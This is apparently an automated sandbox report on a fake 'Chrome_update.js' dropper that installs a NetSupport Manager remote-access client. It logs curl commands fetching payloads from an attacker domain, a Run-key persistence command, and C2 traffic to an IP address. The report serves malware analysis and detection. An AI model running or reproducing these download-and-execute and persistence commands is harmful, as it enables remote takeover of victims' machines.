                                Source: 7zz.exe, 0000000F.00000003.399920793.0000000002491000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000002.910328086.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, client32.exe, 00000016.00000002.424787693.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, client32.exe, 00000017.00000002.442479428.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, PCICL32.DLL.15.drString found in binary or memory: http://www.pci.co.uk/support
                                Source: 7zz.exe, 0000000F.00000003.399920793.0000000002491000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000002.910328086.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, client32.exe, 00000016.00000002.424787693.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, client32.exe, 00000017.00000002.442479428.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, PCICL32.DLL.15.drString found in binary or memory: http://www.pci.co.uk/supportsupport
                                Source: 7zz.exe, 0000000F.00000003.399920793.0000000002836000.00000004.00000020.00020000.00000000.sdmp, 7zz.exe, 0000000F.00000003.399920793.0000000002366000.00000004.00000020.00020000.00000000.sdmp, 7zz.exe, 0000000F.00000003.399920793.0000000002491000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.15.dr, TCCTL32.DLL.15.dr, remcmdstub.exe.15.dr, pcicapi.dll.15.drString found in binary or memory: http://www.symauth.com/cps0(
                                Source: 7zz.exe, 0000000F.00000003.399920793.0000000002836000.00000004.00000020.00020000.00000000.sdmp, 7zz.exe, 0000000F.00000003.399920793.0000000002366000.00000004.00000020.00020000.00000000.sdmp, 7zz.exe, 0000000F.00000003.399920793.0000000002491000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.15.dr, TCCTL32.DLL.15.dr, remcmdstub.exe.15.dr, pcicapi.dll.15.drString found in binary or memory: http://www.symauth.com/rpa00
                                Source: 7zz.exe, 0000000F.00000003.399920793.0000000002836000.00000004.00000020.00020000.00000000.sdmp, 7zz.exe, 0000000F.00000003.399920793.0000000002366000.00000004.00000020.00020000.00000000.sdmp, 7zz.exe, 0000000F.00000003.399920793.0000000002491000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.15.dr, client32.exe.15.dr, TCCTL32.DLL.15.dr, remcmdstub.exe.15.dr, pcicapi.dll.15.drString found in binary or memory: https://d.symcb.com/cps0%
                                Source: 7zz.exe, 0000000F.00000003.399920793.0000000002836000.00000004.00000020.00020000.00000000.sdmp, 7zz.exe, 0000000F.00000003.399920793.0000000002366000.00000004.00000020.00020000.00000000.sdmp, 7zz.exe, 0000000F.00000003.399920793.0000000002491000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.15.dr, client32.exe.15.dr, TCCTL32.DLL.15.dr, remcmdstub.exe.15.dr, pcicapi.dll.15.drString found in binary or memory: https://d.symcb.com/rpa0
                                Source: wscript.exe, 00000000.00000002.423232138.00000187DE940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
                                Source: CacheURL.dat.15.drString found in binary or memory: https://magydostravel.com/cdn/zwmrqqgqnaww.php
                                Source: wscript.exe, 00000000.00000003.413975275.00000187DC99A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.416738367.00000187DC99A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mangoairsoft.com/
                                Source: wscript.exe, 00000000.00000003.413730350.00000187DE6EC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.413870529.00000187DE6F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf250
                                Source: wscript.exe, 00000000.00000003.413730350.00000187DE6EC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.385274963.00000187DE6E3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.413975275.00000187DC98F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.416738367.00000187DC96C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.414042240.00000187DC96C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee
                                Source: wscript.exe, 00000000.00000002.418793988.00000187DCA28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/11.bat?8
                                Source: curl.exe, 00000008.00000002.396872502.0000016D98560000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000008.00000003.396620606.0000016D9859A000.00000004.00000020.00020000.00000000.sdmp, xcpCFFjZKLTFFLZfvqyQQKBvqwD.bat.0.dr, 11[1].bat.0.drString found in binary or memory: https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/22.bat
                                Source: curl.exe, 00000008.00000002.396872502.0000016D98560000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/22.bat-o
                                Source: curl.exe, 00000006.00000002.395193868.000001925B630000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000006.00000002.395218986.000001925B66B000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000006.00000003.394917156.000001925B66B000.00000004.00000020.00020000.00000000.sdmp, xcpCFFjZKLTFFLZfvqyQQKBvqwD.bat.0.dr, 11[1].bat.0.drString found in binary or memory: https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/7zz.exe
                                Source: curl.exe, 00000006.00000002.395193868.000001925B637000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/7zz.exe-
                                Source: curl.exe, 00000004.00000002.391796622.0000023B8DD50000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000003.391545317.0000023B8DD78000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000002.391826816.0000023B8DD92000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000003.391564065.0000023B8DD79000.00000004.00000020.00020000.00000000.sdmp, sett.bat.1.dr, xcpCFFjZKLTFFLZfvqyQQKBvqwD.bat.0.dr, 11[1].bat.0.drString found in binary or memory: https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/lolo.7z
                                Source: curl.exe, 00000004.00000002.391796622.0000023B8DD50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/lolo.7z-
                                Source: 7zz.exe, 0000000F.00000003.400934224.0000000002363000.00000004.00000020.00020000.00000000.sdmp, putty.exe.15.drString found in binary or memory: https://sectigo.com/CPS0
                                Source: 7zz.exe, 0000000F.00000003.400934224.0000000002363000.00000004.00000020.00020000.00000000.sdmp, putty.exe.15.drString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/
                                Source: 7zz.exe, 0000000F.00000003.400934224.0000000002363000.00000004.00000020.00020000.00000000.sdmp, putty.exe.15.drString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
                                Source: unknownHTTP traffic detected: POST http://94.158.247.23/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 22Host: 94.158.247.23Connection: Keep-AliveCMD=POLLINFO=1ACK=1Data Raw: Data Ascii:
                                Source: unknownDNS traffic detected: queries for: mangoairsoft.com
                                Source: global trafficHTTP traffic detected: GET /05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/11.bat?81197 HTTP/1.1Accept: */*Accept-Language: en-usUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: mangoairsoft.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/lolo.7z HTTP/1.1Host: mangoairsoft.comUser-Agent: curl/7.55.1Accept: */*
                                Source: global trafficHTTP traffic detected: GET /05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/7zz.exe HTTP/1.1Host: mangoairsoft.comUser-Agent: curl/7.55.1Accept: */*
                                Source: global trafficHTTP traffic detected: GET /05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/22.bat HTTP/1.1Host: mangoairsoft.comUser-Agent: curl/7.55.1Accept: */*
                                Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                Source: unknownHTTPS traffic detected: 188.127.230.147:443 -> 192.168.2.3:49698 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 188.127.230.147:443 -> 192.168.2.3:49699 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 188.127.230.147:443 -> 192.168.2.3:49700 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 188.127.230.147:443 -> 192.168.2.3:49701 version: TLS 1.2
                                Source: 7zz.exe, 0000000F.00000002.401788266.000000000070A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
                                Source: Yara matchFile source: 18.2.client32.exe.111b8c68.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 22.2.client32.exe.111b8c68.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 23.2.client32.exe.111b8c68.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 15.3.7zz.exe.249b790.3.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 15.3.7zz.exe.24a8280.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 15.3.7zz.exe.24a3908.4.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 15.3.7zz.exe.24a8280.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 22.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 23.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 18.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000016.00000002.424736480.0000000011194000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000017.00000002.442419943.0000000011194000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000012.00000002.910282080.0000000011194000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000F.00000003.399920793.0000000002491000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: 7zz.exe PID: 7416, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: client32.exe PID: 7492, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: client32.exe PID: 7756, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: client32.exe PID: 7796, type: MEMORYSTR
                                Source: Yara matchFile source: C:\ProgramData\PCICL32.DLL, type: DROPPED
                                Source: C:\ProgramData\7zz.exeCode function: 15_2_00403A7015_2_00403A70
                                Source: C:\ProgramData\7zz.exeCode function: 15_2_00417BAE15_2_00417BAE
                                Source: C:\ProgramData\7zz.exeCode function: 15_2_004442E015_2_004442E0
                                Source: C:\ProgramData\7zz.exeCode function: 15_2_004285AD15_2_004285AD
                                Source: C:\ProgramData\7zz.exeCode function: 15_2_0044873015_2_00448730
                                Source: C:\ProgramData\7zz.exeCode function: 15_2_0044CA4015_2_0044CA40
                                Source: C:\ProgramData\7zz.exeCode function: 15_2_00454B1015_2_00454B10
                                Source: C:\ProgramData\7zz.exeCode function: 15_2_00458B3015_2_00458B30
                                Source: C:\ProgramData\7zz.exeCode function: 15_2_00450BD015_2_00450BD0
                                Source: C:\ProgramData\7zz.exeCode function: 15_2_00434D2815_2_00434D28
                                Source: C:\ProgramData\7zz.exeCode function: 15_2_00460DF815_2_00460DF8
                                Source: C:\ProgramData\7zz.exeCode function: 15_2_0045105015_2_00451050
                                Source: C:\ProgramData\7zz.exeCode function: 15_2_0045917015_2_00459170
                                Source: C:\ProgramData\7zz.exeCode function: 15_2_004311FE15_2_004311FE
                                Source: C:\ProgramData\7zz.exeCode function: 15_2_0044946015_2_00449460
                                Source: C:\ProgramData\7zz.exeCode function: 15_2_004514F015_2_004514F0
                                Source: C:\ProgramData\7zz.exeCode function: 15_2_004217DA15_2_004217DA
                                Source: C:\ProgramData\7zz.exeCode function: 15_2_0044192515_2_00441925
                                Source: C:\ProgramData\7zz.exeCode function: 15_2_0042DBB615_2_0042DBB6
                                Source: C:\ProgramData\7zz.exeCode function: 15_2_00459E7015_2_00459E70
                                Source: C:\ProgramData\7zz.exeCode function: 15_2_00461EF015_2_00461EF0
                                Source: C:\ProgramData\7zz.exeCode function: 15_2_00459F8015_2_00459F80
                                Source: C:\ProgramData\7zz.exeCode function: 15_2_0045E0C015_2_0045E0C0
                                Source: C:\ProgramData\7zz.exeCode function: 15_2_0046A2A015_2_0046A2A0
                                Source: C:\ProgramData\7zz.exeCode function: 15_2_0044A44015_2_0044A440
                                Source: C:\ProgramData\7zz.exeCode function: 15_2_0046A46015_2_0046A460
                                Source: C:\ProgramData\7zz.exeCode function: 15_2_0044E43015_2_0044E430
                                Source: C:\ProgramData\7zz.exeCode function: String function: 0046B890 appears 359 times
                                Source: C:\ProgramData\7zz.exeCode function: String function: 00407A18 appears 125 times
                                Source: Chrome_update.jsInitial sample: Strings found which are bigger than 50
                                Source: C:\ProgramData\client32.exeSection loaded: nsmtrace.dllJump to behavior
                                Source: C:\ProgramData\client32.exeSection loaded: nslsp.dllJump to behavior
                                Source: C:\ProgramData\client32.exeSection loaded: pcihooks.dllJump to behavior
                                Source: C:\ProgramData\client32.exeSection loaded: pciinv.dllJump to behavior
                                Source: C:\ProgramData\client32.exeSection loaded: nsmtrace.dllJump to behavior
                                Source: C:\ProgramData\client32.exeSection loaded: nslsp.dllJump to behavior
                                Source: C:\ProgramData\client32.exeSection loaded: nsmtrace.dllJump to behavior
                                Source: C:\ProgramData\client32.exeSection loaded: nslsp.dllJump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
                                Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Chrome_update.js"
                                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C://ProgramData//xcpCFFjZKLTFFLZfvqyQQKBvqwD.bat
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c C:\ProgramData\sett.bat"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -k "https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/lolo.7z" -o "C:\ProgramData\lolo.7z"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c C:\ProgramData\7z.bat"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -k "https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/7zz.exe" -o "C:\ProgramData\7zz.exe"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c C:\ProgramData\qweq.bat"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -k "https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/22.bat" -o "C:\ProgramData\qweq.bat"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "CachedX" /t REG_SZ /d "C:\ProgramData\client32.exe" /f
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c C:\ProgramData\qweq.bat"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\xcopy.exe xcopy /h /y 7zz.exe C:\ProgramData\
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c C:\ProgramData\7zz.exe x -y C:\ProgramData\lolo.7z -oC:\ProgramData\
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe TIMEOUT /T 7
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\ProgramData\7zz.exe C:\ProgramData\7zz.exe x -y C:\ProgramData\lolo.7z -oC:\ProgramData\
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c C:\ProgramData\client32.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\ProgramData\client32.exe C:\ProgramData\client32.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "CachedX" /t REG_SZ /d "C:\ProgramData\client32.exe" /f
                                Source: unknownProcess created: C:\ProgramData\client32.exe "C:\ProgramData\client32.exe"
                                Source: unknownProcess created: C:\ProgramData\client32.exe "C:\ProgramData\client32.exe"
                                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C://ProgramData//xcpCFFjZKLTFFLZfvqyQQKBvqwD.batJump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c C:\ProgramData\sett.bat"Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c C:\ProgramData\7z.bat"Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c C:\ProgramData\qweq.bat"Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c C:\ProgramData\qweq.bat"Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -k "https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/lolo.7z" -o "C:\ProgramData\lolo.7z" Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -k "https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/7zz.exe" -o "C:\ProgramData\7zz.exe" Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -k "https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/22.bat" -o "C:\ProgramData\qweq.bat" Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "CachedX" /t REG_SZ /d "C:\ProgramData\client32.exe" /f Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\xcopy.exe xcopy /h /y 7zz.exe C:\ProgramData\
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c C:\ProgramData\7zz.exe x -y C:\ProgramData\lolo.7z -oC:\ProgramData\
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe TIMEOUT /T 7
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c C:\ProgramData\client32.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "CachedX" /t REG_SZ /d "C:\ProgramData\client32.exe" /f
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\ProgramData\7zz.exe C:\ProgramData\7zz.exe x -y C:\ProgramData\lolo.7z -oC:\ProgramData\ Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\ProgramData\client32.exe C:\ProgramData\client32.exeJump to behavior
                                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
                                Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\11[1].batJump to behavior
                                Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\b1.vbsJump to behavior
                                Source: classification engineClassification label: mal96.troj.evad.winJS@40/37@5/4
                                Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5988:120:WilError_01
                                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C://ProgramData//xcpCFFjZKLTFFLZfvqyQQKBvqwD.bat
                                Source: C:\ProgramData\7zz.exeFile written: C:\ProgramData\NSM.iniJump to behavior
                                Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                                Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                                Source: C:\Windows\System32\curl.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                                Source: C:\Windows\System32\curl.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                                Source: C:\Windows\System32\curl.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                                Source: C:\Windows\System32\curl.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                                Source: C:\Windows\System32\curl.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                                Source: C:\Windows\System32\curl.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                                Source: C:\ProgramData\client32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                                Source: C:\ProgramData\client32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                                Source: C:\ProgramData\client32.exeFile opened: C:\Windows\SysWOW64\riched32.dllJump to behavior
                                Source: C:\ProgramData\7zz.exeFile opened: C:\ProgramData\msvcr100.dllJump to behavior
                                Source: Binary string: msvcr100.i386.pdb source: 7zz.exe, 0000000F.00000003.399920793.0000000002366000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000002.911355079.000000006F0D1000.00000020.00000001.01000000.0000000C.sdmp, client32.exe, 00000016.00000002.425934422.000000006F0D1000.00000020.00000001.01000000.0000000C.sdmp, client32.exe, 00000017.00000002.442852072.000000006F0D1000.00000020.00000001.01000000.0000000C.sdmp, msvcr100.dll.15.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: 7zz.exe, 0000000F.00000003.399920793.0000000002491000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000002.910282080.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000016.00000002.424736480.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000017.00000002.442419943.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.15.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL source: 7zz.exe, 0000000F.00000003.399920793.0000000002366000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000002.911218800.000000006F080000.00000002.00000001.01000000.0000000D.sdmp, HTCTL32.DLL.15.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\client32\Release\client32.pdb source: 7zz.exe, 0000000F.00000003.399920793.0000000002366000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000000.412323829.0000000000242000.00000002.00000001.01000000.00000008.sdmp, client32.exe, 00000012.00000002.908996646.0000000000242000.00000002.00000001.01000000.00000008.sdmp, client32.exe, 00000016.00000000.422585453.0000000000242000.00000002.00000001.01000000.00000008.sdmp, client32.exe, 00000016.00000002.424059492.0000000000242000.00000002.00000001.01000000.00000008.sdmp, client32.exe, 00000017.00000000.440898927.0000000000242000.00000002.00000001.01000000.00000008.sdmp, client32.exe, 00000017.00000002.441826424.0000000000242000.00000002.00000001.01000000.00000008.sdmp, client32.exe.15.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdb source: 7zz.exe, 0000000F.00000003.399920793.0000000002836000.00000004.00000020.00020000.00000000.sdmp, TCCTL32.DLL.15.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\Full\pcichek.pdb source: 7zz.exe, 0000000F.00000003.399920793.0000000002491000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000002.912056852.0000000073512000.00000002.00000001.01000000.0000000A.sdmp, client32.exe, 00000016.00000002.427152630.0000000073512000.00000002.00000001.01000000.0000000A.sdmp, client32.exe, 00000017.00000002.443134336.0000000073512000.00000002.00000001.01000000.0000000A.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: 7zz.exe, 0000000F.00000003.399920793.0000000002366000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000002.911218800.000000006F080000.00000002.00000001.01000000.0000000D.sdmp, HTCTL32.DLL.15.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdbP source: 7zz.exe, 0000000F.00000003.399920793.0000000002836000.00000004.00000020.00020000.00000000.sdmp, TCCTL32.DLL.15.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: 7zz.exe, 0000000F.00000003.399920793.0000000002491000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000002.911966685.000000006F935000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 00000016.00000002.426874731.000000006F935000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 00000017.00000002.443056390.000000006F935000.00000002.00000001.01000000.0000000B.sdmp, pcicapi.dll.15.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: 7zz.exe, 0000000F.00000003.399920793.0000000002491000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000002.910282080.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000016.00000002.424736480.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000017.00000002.442419943.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.15.dr

                                Data Obfuscation

                                barindex
                                JScript performs obfuscated calls to suspicious functions
